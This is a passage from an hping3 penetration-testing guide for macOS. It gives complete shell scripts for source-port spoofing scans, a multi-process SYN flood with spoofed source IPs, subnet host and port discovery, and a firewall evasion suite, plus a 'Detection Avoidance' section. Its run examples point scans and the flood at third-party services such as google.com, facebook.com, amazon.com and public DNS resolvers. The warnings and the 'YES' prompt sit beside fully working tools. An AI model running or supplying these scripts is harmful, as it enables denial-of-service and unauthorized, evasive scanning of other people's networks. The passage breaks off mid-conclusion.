    echo -e "${CYAN}  Note: Port responded normally regardless of source port${NC}"
else
    echo -e "${YELLOW}▸ Verdict: Port $DEST_PORT is FILTERED${NC}"
    echo -e "${CYAN}  Note: Source port $SOURCE_PORT did not bypass filtering${NC}"
    echo -e "${CYAN}  The firewall is properly configured against source port spoofing${NC}"
fi

echo ""
echo -e "${BLUE}Results Summary:${NC}"
echo -e "  Open responses: $OPEN_COUNT"
echo -e "  Closed responses: $CLOSED_COUNT"
echo -e "  Filtered/No response: $FILTERED_COUNT"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

echo ""
echo -e "${YELLOW}Security Notes:${NC}"
echo -e "${CYAN}• Source port spoofing tests firewall trust relationships${NC}"
echo -e "${CYAN}• Some older firewalls trust traffic from DNS (53) or FTP-DATA (20)${NC}"
echo -e "${CYAN}• Modern firewalls should not trust source ports alone${NC}"
echo -e "${CYAN}• This technique is often combined with other evasion methods${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./source_port_scan.sh

How to Run:

# Basic Examples
./source_port_scan.sh google.com                      # Default: port 80, source port 53 (DNS), 1 packet
./source_port_scan.sh github.com 443                  # Scan HTTPS port with DNS source port
./source_port_scan.sh example.com 80 20               # Use FTP-DATA source port (20)
./source_port_scan.sh cloudflare.com 443 53 5         # Send 5 packets for reliability

# Advanced Examples
./source_port_scan.sh 192.168.1.1 22 123 3           # SSH scan with NTP source port
./source_port_scan.sh internalserver.local 3306 68 2  # MySQL scan with DHCP client port
./source_port_scan.sh api.example.com 8080 1337 3     # Custom source port 1337

# Testing Web Servers
./source_port_scan.sh mywebsite.com 80 53 3          # HTTP with DNS source
./source_port_scan.sh mywebsite.com 443 53 3         # HTTPS with DNS source

# Testing Multiple Trusted Ports on Same Target
./source_port_scan.sh target.com 80 53 2             # DNS source port
./source_port_scan.sh target.com 80 20 2             # FTP-DATA source port
./source_port_scan.sh target.com 80 123 2            # NTP source port
./source_port_scan.sh target.com 80 67 2             # DHCP source port

# Internal Network Testing
./source_port_scan.sh 10.0.1.100 445 53 3            # SMB with DNS source
./source_port_scan.sh 10.0.1.100 3389 53 3           # RDP with DNS source

# Testing Popular Services
./source_port_scan.sh google.com 80 53 2             # Google HTTP
./source_port_scan.sh facebook.com 443 53 2          # Facebook HTTPS
./source_port_scan.sh amazon.com 443 20 2            # Amazon with FTP-DATA source

# Testing DNS Servers
./source_port_scan.sh 8.8.8.8 53 123 2               # Google DNS with NTP source
./source_port_scan.sh 1.1.1.1 53 20 2                # Cloudflare DNS with FTP-DATA source

# Help Command
./source_port_scan.sh --help                         # Show usage information
./source_port_scan.sh -h                             # Alternative help flag

Common Trusted Source Ports:
– **53**: DNS – Often allowed through firewalls
– **20**: FTP-DATA – May be trusted for FTP connections
– **123**: NTP – Network Time Protocol, often allowed
– **67/68**: DHCP – Dynamic Host Configuration Protocol
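
The open/closed/filtered verdicts above come down to pattern-matching hping3's output for TCP flags. That classification can be exercised on its own against canned output lines rather than live traffic (no root needed); this is a sketch mirroring the grep checks in source_port_scan.sh:

```shell
#!/bin/sh
# Classify one line of hping3 output into a port verdict.
# Patterns mirror the grep checks used by source_port_scan.sh.
classify_response() {
    case $1 in
        *flags=SA*|*flags=S.A*) echo "OPEN" ;;     # SYN+ACK: handshake accepted
        *flags=RA*|*flags=R*)   echo "CLOSED" ;;   # RST: reachable but closed
        *ICMP*)                 echo "FILTERED" ;; # ICMP error from a firewall
        *)                      echo "FILTERED" ;; # silence: likely dropped
    esac
}

# Canned hping3-style responses (illustrative, not captured from a real host)
classify_response "len=46 ip=203.0.113.10 ttl=56 sport=80 flags=SA seq=0 win=65535"   # OPEN
classify_response "len=46 ip=203.0.113.10 ttl=64 sport=80 flags=RA seq=0 win=0"       # CLOSED
classify_response "ICMP Port Unreachable from ip=203.0.113.1"                          # FILTERED
```

Because `case` takes the first matching branch, the OPEN patterns are tested before the catch-alls.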

Script 8: SYN Flood Attack (Multi-Process with Source IP Decoy)

Purpose:
Performs multi-process SYN flood attacks for authorized DoS testing. This script can cause significant load – especially when used with decoy options.

Create the Script:

cat > ./syn_flood_attack.sh << 'EOF'
#!/bin/zsh

# Function to generate a random IP from a CIDR block
generate_random_ip_from_cidr() {
    local cidr=$1
    local ip_base=${cidr%/*}
    local cidr_bits=${cidr#*/}
    
    # Convert IP to integer
    local ip_parts=(${(s:.:)ip_base})
    local ip_int=$(( (ip_parts[1] << 24) + (ip_parts[2] << 16) + (ip_parts[3] << 8) + ip_parts[4] ))
    
    # Calculate host bits and range
    local host_bits=$((32 - cidr_bits))
    local max_hosts=$((2 ** host_bits - 1))
    
    # Generate random offset within the range
    local random_offset=$((RANDOM % (max_hosts + 1)))
    
    # Add offset to base IP
    local new_ip_int=$((ip_int + random_offset))
    
    # Convert back to IP format
    local octet1=$(( (new_ip_int >> 24) & 255 ))
    local octet2=$(( (new_ip_int >> 16) & 255 ))
    local octet3=$(( (new_ip_int >> 8) & 255 ))
    local octet4=$(( new_ip_int & 255 ))
    
    echo "${octet1}.${octet2}.${octet3}.${octet4}"
}

syn_flood_attack() {
    local target=$1
    local port=$2
    local packet_count=$3
    local processes=$4
    local source_cidr=$5  # Optional CIDR block for source IP randomization
    
    if [ -z "$target" ] || [ -z "$port" ] || [ -z "$packet_count" ] || [ -z "$processes" ]; then
        echo "Usage: syn_flood_attack <target> <port> <packet_count> <processes> [source_cidr]"
        echo "Example: syn_flood_attack example.com 80 1000 4"
        echo "Example with CIDR: syn_flood_attack example.com 80 1000 4 192.168.1.0/24"
        echo ""
        echo "WARNING: This is a DoS attack tool!"
        echo "Only use on systems you own or have explicit permission to test!"
        return 1
    fi
    
    echo "=========================================="
    echo "           SYN FLOOD ATTACK"
    echo "=========================================="
    echo "Target: $target:$port"
    echo "Total packets: $packet_count"
    echo "Processes: $processes"
    echo "Packets per process: $((packet_count / processes))"
    if [ -n "$source_cidr" ]; then
        echo "Source CIDR: $source_cidr"
    else
        echo "Source IPs: Random (--rand-source)"
    fi
    echo ""
    echo "⚠️  WARNING: This will perform a SYN flood attack!"
    echo "⚠️  Only use on systems you own or have explicit permission to test!"
    echo "⚠️  Unauthorized DoS attacks are illegal!"
    echo ""
    echo -n "Do you have authorization to test this target? (type 'YES' to continue): "
    read confirm
    
    if [[ "$confirm" != "YES" ]]; then
        echo "❌ Attack aborted - explicit authorization required"
        return 1
    fi
    
    local packets_per_process=$((packet_count / processes))
    local remaining_packets=$((packet_count % processes))
    
    echo "✅ Starting SYN flood with $processes processes..."
    echo "📊 Monitor system resources during attack"
    
    # Create log directory
    local log_dir="/tmp/syn_flood_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$log_dir"
    
    # Start background processes
    local pids=()
    for ((i=1; i<=processes; i++)); do
        local current_packets=$packets_per_process
        # Add remaining packets to the last process
        if [ $i -eq $processes ]; then
            current_packets=$((packets_per_process + remaining_packets))
        fi
        
        echo "🚀 Starting process $i with $current_packets packets"
        (
            echo "Process $i started at $(date)" > "$log_dir/process_$i.log"
            
            if [ -n "$source_cidr" ]; then
                # Use CIDR block for source IP randomization
                echo "Using source CIDR: $source_cidr" >> "$log_dir/process_$i.log"
                
                # Send packets with randomized source IPs from CIDR block
                # We'll send packets in smaller batches to vary the source IP
                local batch_size=10
                local sent=0
                
                while [ $sent -lt $current_packets ]; do
                    local remaining=$((current_packets - sent))
                    local this_batch=$((remaining < batch_size ? remaining : batch_size))
                    local source_ip=$(generate_random_ip_from_cidr "$source_cidr")
                    
                    # Note: --flood ignores -c and never stops, so use a fast interval instead
                    hping3 -S -p $port -a $source_ip -c $this_batch -i u100 $target >> "$log_dir/process_$i.log" 2>&1
                    sent=$((sent + this_batch))
                done
            else
                # Use completely random source IPs
                echo "Using random source IPs" >> "$log_dir/process_$i.log"
                # Note: --flood ignores -c and never stops, so use a fast interval instead
                hping3 -S -p $port --rand-source -c $current_packets -i u100 $target >> "$log_dir/process_$i.log" 2>&1
            fi
            
            echo "Process $i completed at $(date)" >> "$log_dir/process_$i.log"
            echo "✅ Process $i completed ($current_packets packets sent)"
        ) &
        
        pids+=($!)
    done
    
    echo "⏳ Waiting for all processes to complete..."
    echo "💡 You can monitor progress with: tail -f $log_dir/process_*.log"
    
    # Wait for all processes and show progress
    local completed=0
    while [ $completed -lt $processes ]; do
        completed=0
        for pid in "${pids[@]}"; do
            if ! kill -0 $pid 2>/dev/null; then
                ((completed++))
            fi
        done
        
        echo "📈 Progress: $completed/$processes processes completed"
        sleep 2
    done
    
    echo "🎯 SYN flood attack completed!"
    echo "📋 Logs saved in: $log_dir"
    echo "🧹 Clean up logs with: rm -rf $log_dir"
}

# Check if script is being sourced or executed directly
if [[ "${(%):-%x}" == "${0}" ]]; then
    syn_flood_attack "$@"
fi
EOF

chmod +x ./syn_flood_attack.sh
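
The generate_random_ip_from_cidr helper above leans on zsh-only splitting (`${(s:.:)ip_base}`) and 1-based arrays. For checking the address arithmetic in isolation, here is a POSIX sh sketch with the random offset factored out as a parameter (in the real script the offset would be `RANDOM % hosts`; the function name `ip_in_cidr` is ours):

```shell
#!/bin/sh
# Compute base_ip + offset inside a CIDR block (POSIX version of the zsh helper).
# The caller supplies the offset; offsets beyond the host range wrap around.
ip_in_cidr() {
    ip_base=${1%/*}; bits=${1#*/}; offset=$2
    oldIFS=$IFS; IFS=.; set -- $ip_base; IFS=$oldIFS   # split the dotted quad
    ip_int=$(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
    max_hosts=$(( (1 << (32 - bits)) - 1 ))            # size of the host portion
    new_int=$(( ip_int + offset % (max_hosts + 1) ))
    printf '%d.%d.%d.%d\n' $(( (new_int >> 24) & 255 )) \
        $(( (new_int >> 16) & 255 )) $(( (new_int >> 8) & 255 )) \
        $(( new_int & 255 ))
}

ip_in_cidr 192.168.1.0/24 137   # → 192.168.1.137
ip_in_cidr 10.0.0.0/8 70000     # lands inside 10.0.0.0/8
```

Note that `RANDOM` tops out at 32767 in bash/zsh, so blocks wider than /17 are only partially covered by the original script's offsets.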

How to Run:

# Basic Usage Syntax:
./syn_flood_attack.sh <target> <port> <packet_count> <processes> [source_cidr]

# 1. Test against a local test server (SAFE)
# Send 1000 SYN packets to localhost port 8080 using 4 parallel processes
./syn_flood_attack.sh localhost 8080 1000 4

# 2. Test your own web server
# Send 5000 packets to your own server on port 80 using 10 processes
./syn_flood_attack.sh your-test-server.com 80 5000 10

# 3. Small-scale test
# Send only 100 packets using 2 processes for minimal testing
./syn_flood_attack.sh 127.0.0.1 3000 100 2

# 4. Stress test with more packets
# Send 10000 packets to port 443 using 20 parallel processes
./syn_flood_attack.sh test.example.local 443 10000 20

# 5. Decoy attack using random source IP addresses from a specified CIDR block.
#    This has the highest potential to cause harm. Authorized use only!
./syn_flood_attack.sh target.com 80 1000 4 192.168.0.0/16
./syn_flood_attack.sh target.com 80 1000 4 10.0.0.0/8

# Parameters:
# <target>: IP address or hostname (localhost, 192.168.1.100, test-server.local)
# <port>: Target port number (80 for HTTP, 443 for HTTPS, 22 for SSH)
# <packet_count>: Total number of SYN packets to send (1000, 5000, etc.)
# <processes>: Number of parallel hping3 processes to use (4, 10, etc.)
# [source_cidr]: Optional CIDR block for randomized source IPs (e.g., 192.168.0.0/16)
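
The per-process split the script performs (integer division, with the remainder folded into the last process) can be checked on its own:

```shell
#!/bin/sh
# Distribute TOTAL packets across N processes; the last process absorbs the remainder.
split_packets() {
    total=$1 procs=$2
    per=$(( total / procs ))
    rem=$(( total % procs ))
    i=1
    while [ "$i" -le "$procs" ]; do
        if [ "$i" -eq "$procs" ]; then
            echo $(( per + rem ))   # last process gets the leftovers
        else
            echo "$per"
        fi
        i=$(( i + 1 ))
    done
}

split_packets 1000 4   # prints 250 250 250 250
split_packets 10 3     # prints 3 3 4
```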

Example Output:

 ./syn_flood_attack.sh localhost 8080 1000 4

==========================================
           SYN FLOOD ATTACK
==========================================
Target: localhost:8080
Total packets: 1000
Processes: 4
Packets per process: 250

⚠️  WARNING: This will perform a SYN flood attack!
⚠️  Only use on systems you own or have explicit permission to test!
⚠️  Unauthorized DoS attacks are illegal!

Do you have authorization to test this target? (type 'YES' to continue): YES
✅ Starting SYN flood with 4 processes...
📊 Monitor system resources during attack
🚀 Starting process 1 with 250 packets
🚀 Starting process 2 with 250 packets
🚀 Starting process 3 with 250 packets
🚀 Starting process 4 with 250 packets
⏳ Waiting for all processes to complete...
💡 You can monitor progress with: tail -f /tmp/syn_flood_20250923_114710/process_*.log

Safety Features:
– Explicit authorization confirmation required
– Process monitoring and logging
– Progress tracking with visual indicators
– Automatic log cleanup instructions

Parameters Explained:
**target**: Target hostname/IP address
**port**: Target port number
**packet_count**: Total packets to send
**processes**: Number of parallel processes

Script 9: Comprehensive Network Discovery

Purpose:
Performs comprehensive network discovery combining ICMP and TCP techniques to map active hosts and services across a network range.

Create the Script:

cat > ./network_discovery.sh << 'EOF'
#!/bin/zsh

network_discovery() {
    local network=$1
    local start_ip=${2:-1}
    local end_ip=${3:-254}
    local test_ports=${4:-"22,80,443"}
    
    if [ -z "$network" ]; then
        echo "Usage: network_discovery <network> [start_ip] [end_ip] [test_ports]"
        echo "Example: network_discovery 192.168.1 1 100 '22,80,443,8080'"
        return 1
    fi
    
    echo "🔍 Comprehensive Network Discovery"
    echo "=================================="
    echo "Network: $network.$start_ip-$end_ip"
    echo "Test ports: $test_ports"
    echo ""
    
    # Create results directory
    local results_dir="/tmp/network_discovery_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$results_dir"
    
    # Phase 1: ICMP Discovery
    echo "📡 Phase 1: ICMP Host Discovery"
    echo "==============================="
    local icmp_results="$results_dir/icmp_results.txt"
    
    for i in $(seq $start_ip $end_ip); do
        (hping3 -1 -c 1 $network.$i 2>&1 | grep -E "(bytes from|icmp.*seq=)" && echo "$network.$i" >> "$icmp_results") &
        
        # Limit concurrent processes on macOS
        if (( i % 20 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$icmp_results" ]; then
        echo "✅ ICMP-responsive hosts:"
        cat "$icmp_results" | while read host; do
            echo "  - $host [ICMP]"
        done
    else
        echo "❌ No ICMP-responsive hosts found"
    fi
    
    echo ""
    
    # Phase 2: TCP Discovery
    echo "🚪 Phase 2: TCP Port Discovery"
    echo "=============================="
    local tcp_results="$results_dir/tcp_results.txt"
    
    # Zsh-compatible array splitting
    PORT_ARRAY=(${(s:,:)test_ports})
    
    for i in $(seq $start_ip $end_ip); do
        for port in "${PORT_ARRAY[@]}"; do
            (hping3 -S -p $port -c 1 $network.$i 2>&1 | grep "flags=SA" && echo "$network.$i:$port" >> "$tcp_results") &
        done
        
        # Limit concurrent processes
        if (( i % 10 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$tcp_results" ]; then
        echo "✅ TCP-responsive hosts and ports:"
        cat "$tcp_results" | while read host_port; do
            echo "  - $host_port [TCP]"
        done
    else
        echo "❌ No TCP-responsive hosts found"
    fi
    
    echo ""
    echo "📊 Discovery Summary"
    echo "==================="
    echo "Results saved in: $results_dir"
    echo "ICMP hosts: $([ -s "$icmp_results" ] && wc -l < "$icmp_results" || echo 0)"
    echo "TCP services: $([ -s "$tcp_results" ] && wc -l < "$tcp_results" || echo 0)"
    echo ""
    echo "🧹 Clean up with: rm -rf $results_dir"
}

# Zsh-compatible check for direct execution
if [[ "${(%):-%N}" == "${0}" ]] || [[ "$ZSH_EVAL_CONTEXT" == "toplevel" ]]; then
    network_discovery "$@"
fi
EOF

chmod +x ./network_discovery.sh

How to Run:

# Basic Usage - Scan entire subnet with default ports (22,80,443)
./network_discovery.sh 192.168.1

# Scan the first 50 hosts with the default ports
./network_discovery.sh 192.168.1 1 50

# Scan the first 100 hosts with a custom port list
./network_discovery.sh 192.168.1 1 100 '22,80,443,8080,3306'

# Home Network Scans
./network_discovery.sh 192.168.1 1 20 '80,443'                    # Router and devices
./network_discovery.sh 192.168.0 1 30 '22,80,443,8080'           # Alternative subnet
./network_discovery.sh 10.0.0 1 50 '22,80,443,3389,445'          # Corporate network range

# Service-Specific Discovery
./network_discovery.sh 192.168.1 1 254 '80,443,8080,8443'        # Web servers only
./network_discovery.sh 192.168.1 1 100 '22'                       # SSH servers only
./network_discovery.sh 10.0.0 1 50 '3306,5432,27017,6379'        # Database servers
./network_discovery.sh 192.168.1 1 100 '445,3389,139'            # Windows machines
./network_discovery.sh 192.168.1 1 50 '3000,5000,8000,9000'      # Dev servers

# Quick Targeted Scans
./network_discovery.sh 192.168.1 1 10                             # First 10 IPs, default ports
./network_discovery.sh 192.168.1 100 100 '21,22,23,25,80,110,443,445,3306,3389,5900,8080'  # Single host, many ports
./network_discovery.sh 172.16.0 1 30 '80,443'                    # Fast web discovery

# Your Local Network (based on your IP: 10.223.23.133)
./network_discovery.sh 10.223.23 130 140 '22,80,443'             # Scan near your IP
./network_discovery.sh 10.223.23 1 254 '80,443'                  # Full subnet web scan
./network_discovery.sh 10.223.23 133 133 '22,80,443,5000,8080'   # Scan common ports on your IP (comma-separated list; port ranges are not supported)

# Localhost Testing
./network_discovery.sh 127.0.0 1 1 '22,80,443,3000,8080'         # Test on localhost

# Advanced Usage with sudo (for better ICMP results)
sudo ./network_discovery.sh 192.168.1 1 50
sudo ./network_discovery.sh 10.223.23 130 140 '22,80,443,8080'

# Comprehensive port scan
./network_discovery.sh 192.168.1 1 20 '21,22,23,25,53,80,110,143,443,445,993,995,1433,3306,3389,5432,5900,6379,8080,8443,27017'

# Chain with other commands
./network_discovery.sh 192.168.1 1 10 && echo "Scan complete"
./network_discovery.sh 192.168.1 1 20 '22' | tee scan_results.txt

# View and manage results
ls -la /tmp/network_discovery_*                                   # List all scan results
cat /tmp/network_discovery_*/icmp_results.txt                     # View ICMP results
cat /tmp/network_discovery_*/tcp_results.txt                      # View TCP results
rm -rf /tmp/network_discovery_*                                   # Clean up all results

### LOCAL MACHINE EXAMPLE
# Targeting your local machine and common services. First, check which services are listening:
netstat -an | grep LISTEN | grep -E '\.([0-9]+)\s' | awk '{print $4}' | sed 's/.*\.//' | sort -u | head -20
18313
5000
53
55296
61611
65535
7000
9000
9010
9277

### Check your actual IP address to create working examples:
ifconfig | grep "inet " | grep -v 127.0.0.1 | awk '{print $2}' | head -1
10.223.23.133
### Now test against your actual IP and the ports that are listening. Note that hping3 needs sudo for raw-socket ICMP and TCP SYN scanning:
sudo ./network_discovery.sh 10.223.23 133 133 '5000,7000,9000,9010,53'


### EXAMPLES THAT WILL RETURN SUCCESSFUL RESULTS

# 1. Scan Google's servers (known to respond)
sudo ./network_discovery.sh 142.251.216 78 78 '80,443'
sudo ./network_discovery.sh 142.251.216 1 10 '80,443'

# 2. Scan Cloudflare DNS (highly available)
sudo ./network_discovery.sh 1.1.1 1 1 '53,80,443'
sudo ./network_discovery.sh 1.0.0 1 1 '53,80,443'

# 3. Scan popular DNS servers
sudo ./network_discovery.sh 8.8.8 8 8 '53,443'              # Google DNS
sudo ./network_discovery.sh 8.8.4 4 4 '53,443'              # Google DNS secondary
sudo ./network_discovery.sh 208.67.222 222 222 '53,443'     # OpenDNS

# 4. Scan your local gateway (should respond on some ports)
sudo ./network_discovery.sh 10.223.22 1 1 '80,443,22,53,8080'

# 5. Scan your local subnet for common services
sudo ./network_discovery.sh 10.223.23 1 10 '22,80,443,445,3389,5900'
sudo ./network_discovery.sh 10.223.23 130 140 '80,443,22,3389'

# 6. Quick test with well-known servers
sudo ./network_discovery.sh 93.184.216 34 34 '80,443'      # example.com
sudo ./network_discovery.sh 104.17.113 106 106 '80,443'    # Cloudflare IP

# 7. Scan for web servers in your network
sudo ./network_discovery.sh 10.223.23 1 254 '80,443'

# 8. Multiple reliable targets in one scan
sudo ./network_discovery.sh 1.1.1 1 2 '53,80,443'          # Cloudflare DNS range

# 9. Test against localhost services (based on your running ports)
sudo ./network_discovery.sh 127.0.0 1 1 '5000,7000,9000,9010,53'

# 10. Comprehensive scan of known responsive range
sudo ./network_discovery.sh 142.251.216 70 80 '80,443,22'

Parameters Explained:
**network** (required): Network base (e.g., “192.168.1”)
**start_ip** (optional, default: 1): Starting host number
**end_ip** (optional, default: 254): Ending host number
**test_ports** (optional, default: “22,80,443”): Comma-separated port list

Discovery Phases:
1. **ICMP Discovery**: Tests basic connectivity with ping
2. **TCP Discovery**: Tests specific services on each host
3. **Results Analysis**: Provides comprehensive summary
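
Phase 2 depends on zsh's `${(s:,:)test_ports}` to turn the comma-separated port list into an array. If you port the script to plain sh or bash, IFS splitting does the same job; a POSIX sketch (the function name `split_ports` is ours):

```shell
#!/bin/sh
# POSIX equivalent of zsh's ${(s:,:)test_ports}: split on commas via IFS.
split_ports() {
    oldIFS=$IFS; IFS=,
    set -- $1              # unquoted expansion splits on the comma IFS
    IFS=$oldIFS
    printf '%s\n' "$@"     # one port per line
}

for port in $(split_ports "22,80,443,8080"); do
    echo "would probe port $port"
done
```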

Script 10: Firewall Evasion Test Suite

Purpose:
Performs a comprehensive battery of firewall evasion techniques to test security controls and identify potential bypass methods.

Create the Script:

cat > ./firewall_evasion_test.sh << 'EOF'
#!/bin/zsh

firewall_evasion_test() {
    local target=$1
    local port=${2:-80}
    
    if [ -z "$target" ]; then
        echo "Usage: firewall_evasion_test <target> [port]"
        echo "Example: firewall_evasion_test example.com 443"
        return 1
    fi
    
    echo "🛡️ Comprehensive Firewall Evasion Test Suite"
    echo "============================================="
    echo "Target: $target:$port"
    echo "Testing multiple evasion techniques..."
    echo ""
    
    # Test 1: Normal SYN scan (baseline)
    echo "🔍 Test 1: Normal SYN Scan (Baseline)"
    echo "====================================="
    result1=$(hping3 -S -p $port -c 1 $target 2>&1)
    echo "$result1"
    if echo "$result1" | grep -q "flags=SA"; then
        echo "✅ BASELINE: Port appears OPEN"
    else
        echo "❌ BASELINE: Port appears CLOSED/FILTERED"
    fi
    echo ""
    
    # Test 2: Source port 53 (DNS)
    echo "🔍 Test 2: DNS Source Port Spoofing (53)"
    echo "========================================"
    result2=$(hping3 -S -p $port -s 53 -c 1 $target 2>&1)
    echo "$result2"
    if echo "$result2" | grep -q "flags=SA"; then
        echo "✅ DNS SPOOF: Bypass successful!"
    else
        echo "❌ DNS SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 3: Source port 20 (FTP-DATA)
    echo "🔍 Test 3: FTP-DATA Source Port Spoofing (20)"
    echo "=============================================="
    result3=$(hping3 -S -p $port -s 20 -c 1 $target 2>&1)
    echo "$result3"
    if echo "$result3" | grep -q "flags=SA"; then
        echo "✅ FTP SPOOF: Bypass successful!"
    else
        echo "❌ FTP SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 4: Fragmented packets
    echo "🔍 Test 4: Packet Fragmentation"
    echo "==============================="
    result4=$(hping3 -S -p $port -f -c 1 $target 2>&1)
    echo "$result4"
    if echo "$result4" | grep -q "flags=SA"; then
        echo "✅ FRAGMENTATION: Bypass successful!"
    else
        echo "❌ FRAGMENTATION: No bypass detected"
    fi
    echo ""
    
    # Test 5: FIN scan
    echo "🔍 Test 5: FIN Scan Evasion"
    echo "==========================="
    result5=$(hping3 -F -p $port -c 1 $target 2>&1)
    echo "$result5"
    if ! echo "$result5" | grep -q "flags=R" && ! echo "$result5" | grep -q "ICMP"; then
        echo "✅ FIN SCAN: Potential bypass (no response)"
    else
        echo "❌ FIN SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 6: NULL scan
    echo "🔍 Test 6: NULL Scan Evasion"
    echo "============================"
    result6=$(hping3 -p $port -c 1 $target 2>&1)
    echo "$result6"
    if ! echo "$result6" | grep -q "flags=R" && ! echo "$result6" | grep -q "ICMP"; then
        echo "✅ NULL SCAN: Potential bypass (no response)"
    else
        echo "❌ NULL SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 7: XMAS scan
    echo "🔍 Test 7: XMAS Scan Evasion"
    echo "============================"
    result7=$(hping3 -F -P -U -p $port -c 1 $target 2>&1)
    echo "$result7"
    if ! echo "$result7" | grep -q "flags=R" && ! echo "$result7" | grep -q "ICMP"; then
        echo "✅ XMAS SCAN: Potential bypass (no response)"
    else
        echo "❌ XMAS SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 8: Random source addresses
    echo "🔍 Test 8: Random Source Address"
    echo "================================"
    result8=$(hping3 -S -p $port --rand-source -c 3 $target 2>&1)
    echo "$result8"
    if echo "$result8" | grep -q "flags=SA"; then
        echo "✅ RANDOM SOURCE: Bypass successful!"
    else
        echo "❌ RANDOM SOURCE: No bypass detected"
    fi
    echo ""
    
    # Summary
    echo "📊 Evasion Test Summary"
    echo "======================="
    echo "Target: $target:$port"
    echo "Tests completed: 8"
    echo ""
    echo "Potential bypasses detected:"
    [[ "$result2" =~ "flags=SA" ]] && echo "  ✅ DNS source port spoofing"
    [[ "$result3" =~ "flags=SA" ]] && echo "  ✅ FTP-DATA source port spoofing"
    [[ "$result4" =~ "flags=SA" ]] && echo "  ✅ Packet fragmentation"
    [[ ! "$result5" =~ "flags=R" && ! "$result5" =~ "ICMP" ]] && echo "  ✅ FIN scan stealth"
    [[ ! "$result6" =~ "flags=R" && ! "$result6" =~ "ICMP" ]] && echo "  ✅ NULL scan stealth"
    [[ ! "$result7" =~ "flags=R" && ! "$result7" =~ "ICMP" ]] && echo "  ✅ XMAS scan stealth"
    [[ "$result8" =~ "flags=SA" ]] && echo "  ✅ Random source addressing"
    
    echo ""
    echo "🔒 Recommendations:"
    echo "  - Review firewall rules for source port filtering"
    echo "  - Enable stateful packet inspection"
    echo "  - Configure fragment reassembly"
    echo "  - Monitor for stealth scan patterns"
}

# Zsh-compatible check for direct execution (BASH_SOURCE is not set under zsh)
if [[ "${(%):-%x}" == "${0}" ]]; then
    firewall_evasion_test "$@"
fi
EOF

chmod +x ./firewall_evasion_test.sh

How to Run:


# Test firewall evasion on port 80
sudo ./firewall_evasion_test.sh example.com

# Test firewall evasion on HTTPS port
sudo ./firewall_evasion_test.sh example.com 443

Evasion Techniques Tested:
1. **Baseline SYN scan**: Normal connection attempt
2. **DNS source port spoofing**: Uses port 53 as source
3. **FTP-DATA source port spoofing**: Uses port 20 as source
4. **Packet fragmentation**: Splits packets to evade inspection
5. **FIN scan**: Uses FIN flag for stealth
6. **NULL scan**: No flags set for evasion
7. **XMAS scan**: Multiple flags for confusion
8. **Random source addressing**: Obscures attack origin
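
For quick reference, the hping3 options behind each of the eight tests can be collected in one lookup (the option strings are taken from the test suite above; the short names are ours):

```shell
#!/bin/sh
# Map each evasion technique to the hping3 options the test suite uses for it.
evasion_flags() {
    case $1 in
        baseline)    echo "-S" ;;               # plain SYN probe
        dns-spoof)   echo "-S -s 53" ;;         # SYN from source port 53
        ftp-spoof)   echo "-S -s 20" ;;         # SYN from source port 20
        fragment)    echo "-S -f" ;;            # fragmented SYN
        fin)         echo "-F" ;;               # FIN only
        null)        echo "" ;;                 # no TCP flags set
        xmas)        echo "-F -P -U" ;;         # FIN+PSH+URG
        rand-source) echo "-S --rand-source" ;; # spoofed random source IPs
        *)           return 1 ;;
    esac
}

evasion_flags xmas    # prints: -F -P -U
```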

Important Usage Notes:

macOS-Specific Considerations:
– **Root privileges required**: Most scripts need `sudo` for raw socket access
– **Process limits**: macOS limits concurrent processes, scripts include throttling
– **Firewall interference**: macOS firewall may block outgoing packets
– **Network interfaces**: Scripts auto-detect primary interface

Performance Optimization:
– Use appropriate delays to avoid overwhelming targets
– Limit concurrent processes on macOS (typically 20-50)
– Monitor system resources during intensive scans
– Use temporary files for result collection
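
The throttling pattern those scripts use (launch probes in the background, then `wait` after every batch) looks like this in isolation, with `echo` standing in for an hping3 probe:

```shell
#!/bin/sh
# Run TOTAL quick jobs, draining with `wait` after every BATCH
# so no more than one batch is in flight at a time.
run_throttled() {
    total=$1 batch=$2
    i=1
    while [ "$i" -le "$total" ]; do
        ( echo "job $i done" ) &           # stand-in for one hping3 probe
        if [ $(( i % batch )) -eq 0 ]; then
            wait                           # drain the current batch
        fi
        i=$(( i + 1 ))
    done
    wait                                   # catch any stragglers
}

run_throttled 30 10
```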

Detection Avoidance:

# Slow scanning to avoid detection
sudo ./tcp_syn_scan.sh example.com 1 100 5

# Random timing patterns
sudo ./source_port_scan.sh example.com 80 53 1

Integration with Other Tools:

# Combine with nmap for verification
sudo ./common_ports_scan.sh example.com
nmap -sS example.com

# Use with tcpdump for packet analysis
sudo tcpdump -i en0 host example.com &
sudo ./tcp_syn_ping.sh example.com

Troubleshooting:

Permission Denied:


# Solution: Use sudo for raw socket access
sudo ./script_name.sh

Command Not Found:


# Solution: Verify hping3 installation
brew install hping
which hping3

Network Interface Issues:


# Solution: Specify interface manually
hping3 -I en0 -S -p 80 example.com

Script Debugging:


# Enable verbose output
set -x
source ./script_name.sh

# Check script syntax
zsh -n ./script_name.sh

Legal and Ethical Guidelines:

Before You Begin:
– ✅ Obtain written authorization from system owners
– ✅ Define clear scope and boundaries
– ✅ Establish communication channels
– ✅ Plan for incident response
– ✅ Document all activities

During Testing:
– 🔍 Monitor system impact continuously
– ⏸️ Stop immediately if unauthorized access is gained
– 📝 Document all findings and methods
– 🚫 Do not access or modify data
– ⚠️ Report critical vulnerabilities promptly

After Testing:
– 📋 Provide comprehensive reports
– 🗑️ Securely delete all collected data
– 🤝 Follow responsible disclosure practices
– 📚 Share lessons learned (with permission)

Conclusion

This comprehensive hping3 guide provides 10 essential penetration testing scripts specifically optimized for macOS systems. Each script includes detailed explanations, parameter descriptions, and practical examples using example.com as the target.

Key Takeaways:
– **Authorization is mandatory** – Never test without explicit permission
